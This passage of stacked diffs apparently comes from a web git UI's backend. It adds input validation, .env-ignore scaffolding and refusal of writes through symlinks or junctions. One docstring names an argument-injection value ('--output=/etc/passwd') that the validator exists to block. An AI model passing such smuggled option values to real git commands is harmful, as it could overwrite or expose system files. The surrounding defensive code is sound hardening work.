+    root_resolved = Path(os.path.normcase(str(root.resolve())))
+    resolved = Path(os.path.normcase(str((root / normalised).resolve())))
+    if resolved == root_resolved or not resolved.is_relative_to(root_resolved):
+        _refuse("invalid_path", "a path must stay inside the project")
+    return normalised
+
+
+def validate_rel_paths(root: Path, paths: Sequence[str]) -> list[str]:
+    """Validate a whole request's worth of paths; return them normalised.
+
+    An EMPTY list is refused, and that is the point of the function existing
+    beside :func:`validate_rel_path`: the commands these paths go to
+    (``add -A --``, ``restore --worktree --``, ``clean -f --``) treat "no
+    pathspec" as "the entire working tree", so a UI bug that sent an empty
+    selection would discard every change in the project.
+
+    The count is checked before the paths are, so an absurd request costs
+    one comparison rather than 50,000 filesystem resolutions.
+    """
+    if not paths:
+        _refuse("invalid_path", "no paths were given")
+    if len(paths) > MAX_PATHS:
+        _refuse("invalid_path", f"at most {MAX_PATHS} paths per request")
+    return [validate_rel_path(root, path) for path in paths]
+
+
+def validate_branch_name(name: str) -> str:
+    """Check *name* looks like a branch name. Returns it unchanged.
+
+    A pre-check only -- ``git check-ref-format refs/heads/<name>`` in the
+    service is what actually decides -- so this refuses the cases that must
+    never reach a command line at all: a leading ``-`` (an option), and
+    ``@{`` (the reflog syntax, which would make ``main@{yesterday}`` a
+    perfectly valid ref that is not the branch the user named).
+    """
+    if not name:
+        _refuse("invalid_ref", "a branch name is required")
+    if len(name) > MAX_BRANCH_NAME:
+        _refuse("invalid_ref", f"a branch name may not exceed {MAX_BRANCH_NAME} characters")
+    if "@{" in name:
+        _refuse("invalid_ref", "a branch name may not contain '@{'")
+    if not BRANCH_NAME_RE.match(name):
+        _refuse("invalid_ref", "a branch name may not contain spaces or start with '-' or '@'")
+    return name
+
+
+def validate_remote_name(name: str) -> str:
+    """Check *name* is a remote name (``origin``, ``upstream``, ``fork-2``)."""
+    if not name:
+        _refuse("invalid_value", "a remote name is required")
+    if not REMOTE_NAME_RE.match(name):
+        _refuse("invalid_value",
+                "a remote name may only contain letters, digits, '.', '_' and '-'")
+    return name
+
+
+def validate_remote_url(url: str) -> str:
+    """Check *url* is a remote this server is willing to hand to git.
+
+    Whitespace is refused rather than trimmed: a URL with a space in it is
+    either a paste accident the user should see, or two arguments trying to
+    look like one. The scheme allowlist mirrors ``GIT_ALLOW_PROTOCOL``, so
+    a URL that would fail inside git fails here instead -- with a reason.
+    """
+    if not url:
+        _refuse("invalid_url", "a remote URL is required")
+    if len(url) > MAX_REMOTE_URL:
+        _refuse("invalid_url", f"a remote URL may not exceed {MAX_REMOTE_URL} characters")
+    if _WHITESPACE_RE.search(url) or _CONTROL_RE.search(url):
+        _refuse("invalid_url", "a remote URL may not contain whitespace")
+    if url.startswith("-"):
+        _refuse("invalid_url", "a remote URL may not start with '-'")
+
+    lowered = url.lower()
+    if lowered.startswith(REFUSED_URL_SCHEMES):
+        _refuse("invalid_url", "that transport runs a command and is not allowed",
+                hint="use an https://, ssh:// or file:// URL")
+    if lowered.startswith(ALLOWED_URL_SCHEMES) or SCP_URL_RE.match(url):
+        return url
+    _refuse("invalid_url", "a remote URL must be https://, ssh://, file:// or user@host:path")
+
+
+def validate_commit_message(message: str) -> str:
+    """Check *message* is a usable commit message; return it stripped.
+
+    Newlines and tabs stay -- a commit message is a subject, a blank line
+    and a body, and this is the one value here that is meant to be several
+    lines. Only NUL is refused, because it would truncate the message on its
+    way through stdin.
+    """
+    if "\x00" in message:
+        _refuse("invalid_value", "a commit message may not contain NUL")
+    text = message.strip()
+    if not text:
+        _refuse("invalid_value", "a commit message is required")
+    if len(text) > MAX_COMMIT_MESSAGE:
+        _refuse("invalid_value",
+                f"a commit message may not exceed {MAX_COMMIT_MESSAGE} characters")
+    return text
+
+
+def validate_stash_message(message: str) -> str:
+    """Check *message* is a one-line stash description; return it stripped.
+
+    Unlike a commit message this one IS a single line: it goes in
+    ``--message=<m>`` and comes back as one row of ``git stash list``, so a
+    newline in it would make the list unreadable.
+    """
+    text = message.strip()
+    if not text:
+        _refuse("invalid_value", "a stash message is required")
+    if len(text) > MAX_STASH_MESSAGE:
+        _refuse("invalid_value",
+                f"a stash message may not exceed {MAX_STASH_MESSAGE} characters")
+    if _CONTROL_RE.search(text):
+        _refuse("invalid_value", "a stash message must be a single line")
+    return text
+
+
+def _identity_field(value: str | None, label: str, *,
+                    require_at: bool = False) -> str | None:
+    """One half of ``user.name`` / ``user.email``, stripped, or None.
+
+    None passes through so a request that sets only one of the two does not
+    have to invent the other.
+    """
+    if value is None:
+        return None
+    text = value.strip()
+    if not text:
+        _refuse("invalid_value", f"a {label} is required")
+    if len(text) > MAX_IDENTITY:
+        _refuse("invalid_value", f"a {label} may not exceed {MAX_IDENTITY} characters")
+    if _CONTROL_RE.search(text):
+        _refuse("invalid_value", f"a {label} may not contain control characters")
+    if text.startswith("-"):
+        _refuse("invalid_value", f"a {label} may not start with '-'")
+    if require_at and "@" not in text:
+        _refuse("invalid_value", "an email address must contain '@'")
+    return text
+
+
+def validate_identity(name: str | None = None,
+                      email: str | None = None) -> tuple[str | None, str | None]:
+    """Check the identity a commit would be made with; return it stripped.
+
+    Both halves are optional -- the route sets whichever was sent -- but
+    neither may be blank, contain a newline (it would forge a second header
+    line in the commit object) or start with ``-``.
+    """
+    return (_identity_field(name, "name"),
+            _identity_field(email, "email", require_at=True))
+
+
+def validate_sha(sha: str) -> str:
+    """Check *sha* is an abbreviated-or-full commit id; return it lower-cased.
+
+    Shape only. Whether the object exists is
+    ``rev-parse --verify --quiet <sha>^{commit}``'s answer, in the service,
+    because that is the only place that knows the repository.
+    """
+    text = sha.strip().lower()
+    if not SHA_RE.match(text):
+        _refuse("invalid_ref", "a commit id must be 7 to 40 hexadecimal characters")
+    return text
+
+
+def is_env_secret_path(path: str) -> bool:
+    """Is *path* a dotenv file -- i.e. a file that probably holds secrets?
+
+    ``.env`` and ``.env.<anything>`` are, ``.env.example`` is not (it exists
+    to be read), and neither is ``env.txt``. Only the final segment counts,
+    so ``config/.env`` is caught as well as ``.env``.
+
+    Compared case-insensitively because the filesystems this runs on mostly
+    are: on Windows, ``.ENV`` and ``.env`` are one file, and a check that
+    only knew the lowercase spelling would serve it.
+    """
+    name = re.split(r"[\\/]", str(path))[-1].lower()
+    if name == ".env":
+        return True
+    return name.startswith(".env.") and name != ".env.example"

--- a/backend/app/core/git/repo.py
+++ b/backend/app/core/git/repo.py
@@ -29,6 +29,7 @@ about one file or one commit's contents:
 
 from __future__ import annotations
 
+import os
 import re
 from collections.abc import Sequence
 from pathlib import Path
@@ -44,6 +45,18 @@ from .status import parse_porcelain_v2
 #: out of history. Compared exactly: ``.env*`` also hides ``.env.example``,
 #: which is meant to be committed.
 ENV_IGNORE_LINE = ".env"
+
+#: A trailing comment as a PERSON writes one: whitespace, then ``#``. git
+#: reads a comment only in the first column, so this is stripped because of
+#: what the author meant, not because of what git does -- see
+#: :func:`_ignores_env`.
+_TRAILING_COMMENT_RE = re.compile(r"\s+#.*$")
+
+#: What to tell somebody whose stage / unstage / discard went through a
+#: link. Worded differently from the read side's "symbolic links are not
+#: served" on purpose: nothing was served, and what was refused was a WRITE
+#: aimed through somebody else's directory.
+LINK_PARENT_HINT = "paths through a link are not managed here"
 
 #: The status read, in full. ``--untracked-files=all`` lists FILES rather
 #: than the directories the default collapses them into, which is what lets
@@ -134,7 +147,29 @@ def ensure_scaffold(root: Path) -> list[str]:
 
 
 def _ignores_env(path: Path) -> bool:
-    """Is there already a line that is exactly ``.env``?
+    """Is ``.env`` already ignored -- in any of the ways people write it?
+
+    Four spellings mean the same thing to whoever typed them: ``.env``,
+    ``/.env`` (the same rule, anchored to the repository root), ``.env/``
+    and either of those with trailing spaces or a trailing comment after
+    it. Reading only the first made :func:`ensure_scaffold` append a SECOND
+    ``.env`` to a file that plainly already had one, which reads as a bug in
+    the tab and leaves the user's own file worse than it found it.
+
+    Two of those spellings do not, by git's own rules, ignore a FILE called
+    ``.env``: ``.env/`` matches a directory only, and ``#`` starts a comment
+    just in the first column, so ``.env  # secrets`` is a pattern with a
+    comment inside it. They still count here, and that is the deliberate
+    half of this function. ``ensure_scaffold`` never rewrites a file the
+    user already has, and a line naming ``.env`` is the author's own
+    decision about it; appending a rule beside their near-miss would leave
+    two lines about ``.env`` -- one of which does nothing -- rather than
+    telling anybody the first one was wrong.
+
+    An un-ignore rule is the one spelling that must NOT count, which is why
+    :func:`_ignore_rule` leaves the leading ``!`` where it is: this file
+    holds the user's API keys, and the tab is not the place where "commit my
+    secrets" is honoured by accident.
 
     Decoded with ``errors="replace"`` because this only ever asks a question
     about ASCII: a ``.gitignore`` in some other encoding must not make this
@@ -144,7 +179,99 @@ def _ignores_env(path: Path) -> bool:
         text = path.read_bytes().decode("utf-8", errors="replace")
     except OSError:
         return False
-    return any(line.strip() == ENV_IGNORE_LINE for line in text.splitlines())
+    return any(_ignore_rule(line) == ENV_IGNORE_LINE
+               for line in text.splitlines())
+
+
+def _ignore_rule(line: str) -> str:
+    """The path one ``.gitignore`` line is about, near enough to compare.
+
+    Not a gitignore parser and not trying to be -- no globs, no negation
+    semantics, no directory matching. It removes the four things a person
+    writes AROUND a rule (surrounding whitespace, a trailing comment, the
+    leading ``/`` that anchors it to the root, the trailing ``/`` that
+    restricts it to a directory) and hands back what is left; a whole-line
+    comment comes back empty. Everything it cannot account for -- ``*.env``,
+    a pattern with a glob in it -- simply does not compare equal, which
+    means the scaffold appends its own line, which is the safe direction to
+    be wrong in.
+    """
+    text = line.strip()
+    if text.startswith("#"):
+        return ""
+    text = _TRAILING_COMMENT_RE.sub("", text).strip()
+    if text.endswith("/"):
+        text = text[:-1]
+    if text.startswith("/"):
+        text = text[1:]
+    return text
+
+
+# --- a path that does not stay where it says it is --------------------------
+
+
+def path_redirects(root: Path, segments: Sequence[str]) -> bool:
+    """Does *root* joined with *segments* land somewhere other than it says?
+
+    The check that catches a Windows JUNCTION -- the redirection ``mklink
+    /J`` makes, which ``Path.is_symlink`` answers False for and which git
+    walks through like any other directory. Resolving both sides and
+    comparing is what sees one: the lexical path is what the request NAMED,
+    the resolved path is where the filesystem actually goes, and a
+    difference between them means something in the chain redirected.
+
+    The root's own links cancel out, because both sides start from
+    ``root.resolve()``: a project directory that is itself reached through a
+    link -- ``/tmp`` on macOS is one -- does not make every path in it a
+    refusal. Compared with ``normcase``, because ``resolve`` hands back the
+    case the filesystem stores and the request carries the case the user
+    typed.
+
+    Takes SEGMENTS rather than a path so that the two callers can ask about
+    different parts of the same path: the read side asks about all of it
+    (``diff._refuse_a_link``), the write side about its parents only
+    (:func:`refuse_link_parents`). The comparison itself is subtle enough
+    that it must exist once.
+    """
+    lexical = root.resolve().joinpath(*segments)
+    actual = root.joinpath(*segments).resolve()
+    return os.path.normcase(str(actual)) != os.path.normcase(str(lexical))
+
+
+def refuse_link_parents(root: Path, path: str) -> None:
+    """Refuse a WRITE whose path goes through a link or a junction.
+
+    Measured, and the reason this exists: with ``notes`` a junction to a
+    gitignored ``secrets`` folder, discarding ``notes/keys.txt`` deleted the
+    real ``secrets/keys.txt``. Every check before this one passed and was
+    right to -- the path is relative, holds no ``..``, and RESOLVES inside
+    the project, which is exactly what a link to another folder of the same
+    project does. git then cleaned the file at the other end of it.
+
+    The FINAL component may be a link, and that is not an oversight. To git
+    a symlink is an ordinary tracked file (a blob holding the path it points
+    at), so staging one, or restoring one somebody deleted, is a legitimate
+    operation, and refusing it would leave the tab unable to manage a
+    repository that contains one. What is refused is a link in the MIDDLE of
+    a path, where the redirection is not the thing being operated on but the
+    way to something else.
+
+    Both checks, for the same reason the read side runs both: ``is_symlink``
+    sees a symbolic link at any depth and cannot see a junction;
+    :func:`path_redirects` sees either.
+    """
+    parents = path.split("/")[:-1]
+    current = root
+    for segment in parents:
+        current = current / segment
+        if current.is_symlink():
+            raise GitError("invalid_path", 400,
+                           f"{path} goes through a symbolic link",
+                           hint=LINK_PARENT_HINT)
+    if path_redirects(root, parents):
+        raise GitError("invalid_path", 400,
+                       f"{path} does not stay where it says it is",
+                       hint=LINK_PARENT_HINT)
 
 
 # --- reading the state -----------------------------------------------------

--- a/backend/app/core/git/repo.py
+++ b/backend/app/core/git/repo.py
@@ -263,6 +263,40 @@ def path_redirects(root: Path, segments: Sequence[str]) -> bool:
     return os.path.normcase(str(actual)) != os.path.normcase(str(lexical))
 
 
+def link_parent_refusal(root: Path, path: str) -> GitError | None:
+    """The refusal *path* earns for reaching its file through a link; or None.
+
+    The same question :func:`refuse_link_parents` asks, as a value rather
+    than as an exception, because the whole-tree writes have to SKIP what
+    the per-path guard refuses instead of failing over it -- and "what the
+    per-path guard refuses" must be one answer, not a second opinion that
+    can drift from the first.
+
+    Both checks, for the same reason the read side runs both: ``is_symlink``
+    sees a symbolic link at any depth and cannot see a junction;
+    :func:`path_redirects` sees either. A path that cannot be RESOLVED at
+    all (a symlink cycle) hands back its own refusal: it cannot be shown to
+    stay where it says it is either.
+    """
+    parents = path.split("/")[:-1]
+    current = root
+    for segment in parents:
+        current = current / segment
+        if current.is_symlink():
+            return GitError("invalid_path", 400,
+                            f"{path} goes through a symbolic link",
+                            hint=LINK_PARENT_HINT)
+    try:
+        redirected = path_redirects(root, parents)
+    except GitError as exc:
+        return exc
+    if redirected:
+        return GitError("invalid_path", 400,
+                        f"{path} does not stay where it says it is",
+                        hint=LINK_PARENT_HINT)
+    return None
+
+
 def refuse_link_parents(root: Path, path: str) -> None:
     """Refuse a WRITE whose path goes through a link or a junction.
 
@@ -281,22 +315,12 @@ def refuse_link_parents(root: Path, path: str) -> None:
     a path, where the redirection is not the thing being operated on but the
     way to something else.
 
-    Both checks, for the same reason the read side runs both: ``is_symlink``
-    sees a symbolic link at any depth and cannot see a junction;
-    :func:`path_redirects` sees either.
+    :func:`link_parent_refusal` is the same question asked without raising,
+    for the whole-tree writes.
     """
-    parents = path.split("/")[:-1]
-    current = root
-    for segment in parents:
-        current = current / segment
-        if current.is_symlink():
-            raise GitError("invalid_path", 400,
-                           f"{path} goes through a symbolic link",
-                           hint=LINK_PARENT_HINT)
-    if path_redirects(root, parents):
-        raise GitError("invalid_path", 400,
-                       f"{path} does not stay where it says it is",
-                       hint=LINK_PARENT_HINT)
+    refusal = link_parent_refusal(root, path)
+    if refusal is not None:
+        raise refusal
 
 
 # --- reading the state -----------------------------------------------------

--- a/backend/app/core/git/repo.py
+++ b/backend/app/core/git/repo.py
@@ -244,9 +244,22 @@ def path_redirects(root: Path, segments: Sequence[str]) -> bool:
     (``diff._refuse_a_link``), the write side about its parents only
     (:func:`refuse_link_parents`). The comparison itself is subtle enough
     that it must exist once.
+
+    A resolve that RAISES is a refusal, not a crash. On Python 3.11 -- the
+    runtime this ships on -- a symlink cycle (``a -> b -> a``) raises
+    ``RuntimeError("Symlink loop")``; 3.13 no longer does, which is exactly
+    the kind of difference that turns into a 500 on somebody else's
+    machine. A path whose real location cannot be established is one this
+    API refuses.
     """
-    lexical = root.resolve().joinpath(*segments)
-    actual = root.joinpath(*segments).resolve()
+    try:
+        root_resolved = root.resolve()
+        actual = root.joinpath(*segments).resolve()
+    except (OSError, RuntimeError):
+        raise GitError("invalid_path", 400,
+                       f"{'/'.join(segments)} could not be resolved",
+                       hint="the path could not be resolved") from None
+    lexical = root_resolved.joinpath(*segments)
     return os.path.normcase(str(actual)) != os.path.normcase(str(lexical))
 
 

--- a/backend/app/core/git/repo.py
+++ b/backend/app/core/git/repo.py
@@ -1,0 +1,342 @@
+"""The repository itself: make one, read its state, say who commits in it.
+
+Everything here is a plain function of ``(root, ...)`` that runs git and
+returns a model -- no service, no lock, no event loop -- so a test can call
+it against a real temporary repository, and the service above can call the
+same function inside ``asyncio.to_thread``.
+
+What lives here is the questions that are about the REPOSITORY rather than
+about one file or one commit's contents:
+
+* :func:`init` and :func:`ensure_scaffold` -- turning a project directory
+  into a repository, with the same ``.gitignore`` ``cdui project init``
+  writes. The scaffold is not decoration: its first line is ``.env``, and a
+  repository that does not ignore it will sooner or later have the user's
+  API keys in its history, where no later ``.gitignore`` can reach them.
+* :func:`read_status` -- one ``status --porcelain=v2`` read plus the two
+  flags that format does not carry. Every other module needs it: a diff has
+  to know whether a path is untracked, a discard has to know what is
+  actually changed, and every mutation reads it again afterwards.
+* :func:`read_identity` / :func:`write_identity` -- ``user.name`` and
+  ``user.email``, and WHERE they come from. A commit made with the wrong
+  name is a commit that has to be amended, so the tab shows the scope
+  before it lets one be made, and only ever writes ``--local``.
+* :func:`resolve_commit` / :func:`first_parent` -- turning the sha a browser
+  sent into one git has verified, and finding the commit a merge should be
+  compared against. Both live here rather than in ``log`` or ``diff``
+  because both of those need them, and neither may import the other.
+"""
+
+from __future__ import annotations
+
+import re
+from pathlib import Path
+
+from ..project import PROJECT_GITATTRIBUTES, PROJECT_GITIGNORE
+from .errors import GitError
+from .models import ConfigScope, GitStatus, Identity
+from .paths import validate_identity, validate_sha
+from .runner import T_LOCAL, T_STATUS, run_git
+from .status import parse_porcelain_v2
+
+#: The line ``.gitignore`` has to contain for the project's secrets to stay
+#: out of history. Compared exactly: ``.env*`` also hides ``.env.example``,
+#: which is meant to be committed.
+ENV_IGNORE_LINE = ".env"
+
+#: The status read, in full. ``--untracked-files=all`` lists FILES rather
+#: than the directories the default collapses them into, which is what lets
+#: the tab offer (and ``discard`` remove) one new file out of a new folder;
+#: ``--show-stash`` is the only place porcelain v2 reports the stash depth;
+#: ``-z`` is what makes a filename with a newline in it safe to parse.
+STATUS_ARGS: tuple[str, ...] = (
+    "status", "--porcelain=v2", "--branch", "--show-stash",
+    "--untracked-files=all", "-z",
+)
+
+#: The three files that say a merge or a rebase is half-finished. Asked for
+#: in ONE ``rev-parse``, which answers with one line each, in this order.
+IN_PROGRESS_PATHS: tuple[str, ...] = ("MERGE_HEAD", "rebase-merge",
+                                      "rebase-apply")
+
+#: ``\`` before any character in a C-quoted config origin. git quotes an
+#: origin that contains a backslash -- which every absolute Windows path
+#: does -- as ``file:"C:\\Users\\me\\.gitconfig"``.
+_ESCAPE_RE = re.compile(r"\\(.)")
+
+
+# --- becoming a repository -------------------------------------------------
+
+
+def init(root: Path) -> None:
+    """``git init`` in *root*. The caller has already decided *root* may be.
+
+    Only ever the project directory (the service checks that): a stray
+    ``git init`` one level up would make the tab operate on a repository
+    containing the user's whole home directory.
+
+    Re-running this on a directory that is ALREADY a repository is safe and
+    deliberate -- git re-initialises it, which changes nothing about the
+    history, the index or the working tree -- so a stale UI that offers the
+    button twice cannot destroy anything.
+    """
+    if not root.is_dir():
+        raise GitError("not_found", 404,
+                       f"the project directory {root} does not exist",
+                       hint="open a project directory that exists")
+    run_git(["init", "-q"], cwd=root, timeout=T_LOCAL)
+
+
+def ensure_scaffold(root: Path) -> list[str]:
+    """Give *root* the ``.gitignore`` / ``.gitattributes`` a project needs.
+
+    Returns the names of the files this changed, which is what the tab shows
+    after an init ("created .gitignore").
+
+    Never rewrites a file the user already has. A missing ``.gitignore`` is
+    written from :data:`~app.core.project.PROJECT_GITIGNORE`; an existing one
+    that does not ignore ``.env`` gets that one line appended, and nothing
+    else. An existing ``.gitattributes`` is left exactly as it is: its rules
+    change how git stores every file in the repository, and appending to
+    somebody's own line-ending policy would be a worse bug than the one the
+    default line prevents.
+
+    Appending starts with a newline, so a file whose last line has no
+    terminator does not become ``*.pklo.env``. A blank line in a
+    ``.gitignore`` is ignored by git, which is why that is the safe way
+    round. The bytes already in the file are never re-encoded -- the append
+    is binary -- so a ``.gitignore`` saved as anything other than UTF-8
+    survives it.
+
+    An explicit ``!.env`` (an un-ignore rule) is not treated as the line
+    being present, so the appended rule wins: this file holds the user's API
+    keys, and the tab is not the place where "commit my secrets" is honoured
+    by accident.
+    """
+    written: list[str] = []
+
+    gitignore = root / ".gitignore"
+    if not gitignore.exists():
+        gitignore.write_bytes(PROJECT_GITIGNORE.encode("utf-8"))
+        written.append(".gitignore")
+    elif not _ignores_env(gitignore):
+        with gitignore.open("ab") as handle:
+            handle.write(b"\n" + ENV_IGNORE_LINE.encode("ascii") + b"\n")
+        written.append(".gitignore")
+
+    attributes = root / ".gitattributes"
+    if not attributes.exists():
+        attributes.write_bytes(PROJECT_GITATTRIBUTES.encode("utf-8"))
+        written.append(".gitattributes")
+
+    return written
+
+
+def _ignores_env(path: Path) -> bool:
+    """Is there already a line that is exactly ``.env``?
+
+    Decoded with ``errors="replace"`` because this only ever asks a question
+    about ASCII: a ``.gitignore`` in some other encoding must not make this
+    raise, and the bytes are never written back.
+    """
+    try:
+        text = path.read_bytes().decode("utf-8", errors="replace")
+    except OSError:
+        return False
+    return any(line.strip() == ENV_IGNORE_LINE for line in text.splitlines())
+
+
+# --- reading the state -----------------------------------------------------
+
+
+def read_status(root: Path) -> GitStatus:
+    """One full status read of *root*, parsed.
+
+    Two commands, because porcelain v2 does not say whether a merge or a
+    rebase is half-finished and the tab has to disable half its buttons when
+    one is. ``rev-parse --git-path`` answers all three questions at once and
+    costs one process; whether each path EXISTS is then a filesystem
+    question, not git's.
+
+    Read-only, so it runs without taking the index lock: this is polled
+    while the tab is open, and a status that occasionally lags is better
+    than a status that fights a real operation for the lock.
+    """
+    result = run_git(list(STATUS_ARGS), cwd=root, timeout=T_STATUS,
+                     read_only=True)
+    merge, rebase = _in_progress(root)
+    return parse_porcelain_v2(result.stdout, merge_in_progress=merge,
+                              rebase_in_progress=rebase)
+
+
+def _in_progress(root: Path) -> tuple[bool, bool]:
+    """``(merge, rebase)`` -- is one of them half-finished in *root*?
+
+    ``--git-path`` prints paths RELATIVE to the working tree it was run in
+    (``.git/MERGE_HEAD``), and absolute ones when the git directory is
+    somewhere else, and ``root / line`` is correct for both: joining an
+    absolute path replaces the root.
+
+    Fewer than three lines means a git that answered something this does not
+    understand. "No merge in progress" is the safe answer to that -- it
+    leaves the buttons enabled and lets git itself refuse -- and a status
+    read must not fail over a flag.
+    """
+    result = run_git(["rev-parse", *(arg for path in IN_PROGRESS_PATHS
+                                     for arg in ("--git-path", path))],
+                     cwd=root, timeout=T_STATUS, read_only=True)
+    lines = result.out.splitlines()
+    if len(lines) < len(IN_PROGRESS_PATHS):
+        return False, False
+    merge_head, rebase_merge, rebase_apply = (root / line for line in lines[:3])
+    return merge_head.exists(), rebase_merge.exists() or rebase_apply.exists()
+
+
+# --- who commits -----------------------------------------------------------
+
+
+def read_identity(root: Path) -> Identity:
+    """``user.name`` / ``user.email`` as this repository sees them.
+
+    Two reads rather than one ``--list``, because the answer wanted is the
+    EFFECTIVE value of each -- what a commit made right now would carry --
+    and that is what ``--get`` returns for each key on its own.
+    """
+    name, name_scope = _config_value(root, "user.name")
+    email, email_scope = _config_value(root, "user.email")
+    return Identity(name=name, email=email, name_scope=name_scope,
+                    email_scope=email_scope)
+
+
+def _config_value(root: Path, key: str) -> tuple[str | None, ConfigScope | None]:
+    """One config value and where it came from; ``(None, None)`` when unset.
+
+    ``git config --get`` exits 1 for "no such key", which is an answer and
+    not a failure -- hence ``ok_codes``.
+    """
+    result = run_git(["config", "--show-origin", "--get", key], cwd=root,
+                     timeout=T_STATUS, ok_codes=(0, 1), read_only=True)
+    if result.returncode != 0:
+        return None, None
+    origin, _, value = result.out.rstrip("\n").partition("\t")
+    text = value.strip()
+    if not text:
+        return None, None
+    return text, _scope_from_origin(origin)
+
+
+def _scope_from_origin(origin: str) -> ConfigScope:
+    """Which config file git read a value from, as the three scopes.
+
+    git says this as a path, not a scope (``--show-scope`` would say it
+    directly, and needs a git newer than the one this tab supports), so the
+    path is what has to be read:
+
+    * ``file:.git/config`` -- relative, because git prints it relative to
+      the working tree -- or any absolute path ending the same way is THIS
+      repository: ``local``.
+    * a ``.gitconfig`` anywhere, or an XDG ``.config/git/config``, is the
+      user's own: ``global``.
+    * anything else -- ``/etc/gitconfig``, a path some ``GIT_CONFIG_GLOBAL``
+      invented, ``command line:``, a config blob -- is reported as
+      ``system``, the scope that means "not yours to edit here". The tab
+      only ever WRITES local, so a wrong guess here costs a label and
+      nothing else.
+    """
+    path = _origin_path(origin)
+    if path is None:
+        return "system"
+    if path.endswith(".git/config"):
+        return "local"
+    if ".gitconfig" in path or path.endswith("/.config/git/config"):
+        return "global"
+    return "system"
+
+
+def _origin_path(origin: str) -> str | None:
+    """The filename out of a ``file:<path>`` origin, POSIX and lower-cased.
+
+    None for an origin that is not a file (``command line:``, ``blob:...``).
+    An origin containing a backslash arrives C-quoted --
+    ``file:"C:\\\\Users\\\\me\\\\.gitconfig"`` -- so the quotes come off and
+    every ``\\x`` collapses to ``x``, which is right for the ``\\\\`` and
+    ``\\"`` git actually emits.
+    """
+    if not origin.startswith("file:"):
+        return None
+    raw = origin[len("file:"):]
+    if len(raw) >= 2 and raw.startswith('"') and raw.endswith('"'):
+        raw = _ESCAPE_RE.sub(r"\1", raw[1:-1])
+    return raw.replace("\\", "/").lower()
+
+
+def write_identity(root: Path, name: str | None = None,
+                   email: str | None = None) -> dict[str, str]:
+    """Set ``user.name`` / ``user.email`` in THIS repository's config.
+
+    Returns what was written, which is what the tab echoes back. Either half
+    may be left out; a request with neither writes nothing, which is a no-op
+    and not an error.
+
+    ``--local`` always. Writing the user's global config from a web request
+    would change every repository on the machine, including ones this app
+    has never been pointed at.
+
+    The value is a positional argument to ``git config <name> <value>``, so
+    it cannot be read as an option whatever it contains -- but it is
+    validated anyway (no leading ``-``, no control characters, an ``@`` in
+    the email), because a name with a newline in it would forge a second
+    header line in every commit object it signs.
+    """
+    clean_name, clean_email = validate_identity(name, email)
+    written: dict[str, str] = {}
+    if clean_name is not None:
+        run_git(["config", "--local", "user.name", clean_name], cwd=root,
+                timeout=T_LOCAL)
+        written["name"] = clean_name
+    if clean_email is not None:
+        run_git(["config", "--local", "user.email", clean_email], cwd=root,
+                timeout=T_LOCAL)
+        written["email"] = clean_email
+    return written
+
+
+# --- commits ---------------------------------------------------------------
+
+
+def resolve_commit(root: Path, sha: str) -> str:
+    """The full sha of the commit *sha* names. 404 when there is no such one.
+
+    Shape first (:func:`~app.core.git.paths.validate_sha`), so a ref like
+    ``HEAD~3`` or ``--output=/etc/passwd`` never reaches a command line, and
+    then ``rev-parse --verify --quiet <sha>^{commit}``, which answers with
+    the full id and exits 1 -- silently, with no stderr to classify -- for
+    an id no object has. ``^{commit}`` is what makes a tag or a tree name
+    fail here rather than three commands later.
+    """
+    clean = validate_sha(sha)
+    result = run_git(["rev-parse", "--verify", "--quiet", f"{clean}^{{commit}}"],
+                     cwd=root, timeout=T_STATUS, ok_codes=(0, 1),
+                     read_only=True)
+    full = result.out.strip()
+    if result.returncode != 0 or not full:
+        raise GitError("not_found", 404, f"no commit {clean} in this repository",
+                       hint="the history may have been rewritten; reload the log")
+    return full
+
+
+def first_parent(root: Path, commit: str) -> str | None:
+    """The sha of *commit*'s first parent, or None for a root commit.
+
+    What a merge commit should be compared against. git's own
+    ``--first-parent`` does NOT restrict ``diff-tree`` to it (measured on
+    2.53: with ``-m`` it prints one diff per parent, concatenated), and the
+    option that would -- ``--diff-merges=first-parent`` -- is newer than the
+    git this tab supports. Asking for the parent and diffing the two trees
+    is one extra process and is exactly right on every version.
+    """
+    result = run_git(["rev-parse", "--verify", "--quiet", f"{commit}^"],
+                     cwd=root, timeout=T_STATUS, ok_codes=(0, 1),
+                     read_only=True)
+    parent = result.out.strip()
+    return parent if result.returncode == 0 and parent else None

--- a/backend/app/core/git/repo.py
+++ b/backend/app/core/git/repo.py
@@ -144,21 +144,24 @@ def _ignores_env(path: Path) -> bool:
     """Would this ``.gitignore`` already keep a FILE called ``.env`` out?
 
     The question is git's, not the author's. Two spellings answer yes --
-    ``.env`` and ``/.env``, either of them with trailing whitespace, which
-    git drops before matching -- and reading only the first made
+    ``.env`` and ``/.env``, either of them with trailing SPACES, which git
+    drops before matching -- and reading only the first made
     :func:`ensure_scaffold` append a second ``.env`` under a line that
     plainly already did the job.
 
-    Everything else answers NO, including the three near-misses that look
-    like they should count. ``.env/`` is a directory-only pattern and does
-    not match a file; ``.env  # secrets`` is not a rule with a comment on
-    it, because ``.gitignore`` has no trailing comments -- it is a pattern
-    matching a file with that entire name; and ``  .env`` keeps its leading
-    spaces, so it matches a file whose name starts with two of them.
-    Whoever wrote any of the three believes their secrets are ignored and
-    they are not, so the line goes in. A duplicate rule is harmless; a
-    missing one is the leak this whole scaffold exists to prevent, and that
-    asymmetry is what decides every uncertain case here.
+    Everything else answers NO, including the near-misses that look like
+    they should count. ``.env/`` is a directory-only pattern and does not
+    match a file; ``.env  # secrets`` is not a rule with a comment on it,
+    because ``.gitignore`` has no trailing comments -- it is a pattern
+    matching a file with that entire name; ``  .env`` keeps its leading
+    spaces, so it matches a file whose name starts with two of them; and
+    ``.env\\t`` keeps its trailing TAB, because spaces are the only trailing
+    whitespace git drops (measured: ``git status`` lists ``.env`` as
+    untracked against every one of them). Whoever wrote any of them
+    believes their secrets are ignored and they are not, so the line goes
+    in. A duplicate rule is harmless; a missing one is the leak this whole
+    scaffold exists to prevent, and that asymmetry is what decides every
+    uncertain case here.
 
     An un-ignore rule is the same call for a different reason: ``!.env``
     does not count, the appended rule goes in after it, and the last
@@ -184,17 +187,22 @@ def _ignore_rule(line: str) -> str:
     Not a gitignore parser and not trying to be -- no globs, no negation
     semantics, no directory matching. It removes the only two things git
     itself removes from a line before matching it against a file at the top
-    level: TRAILING whitespace, which git drops unless it is escaped, and
+    level: trailing SPACES, which git drops unless they are escaped, and
     the leading ``/`` that anchors a rule to the repository root, which for
     a root-level file changes nothing about what it matches.
 
-    LEADING whitespace is NOT removed, and the difference is not pedantry.
-    git keeps it: a line reading ``  .env`` is a pattern for a file whose
-    name begins with two spaces, and a ``.gitignore`` saying that does not
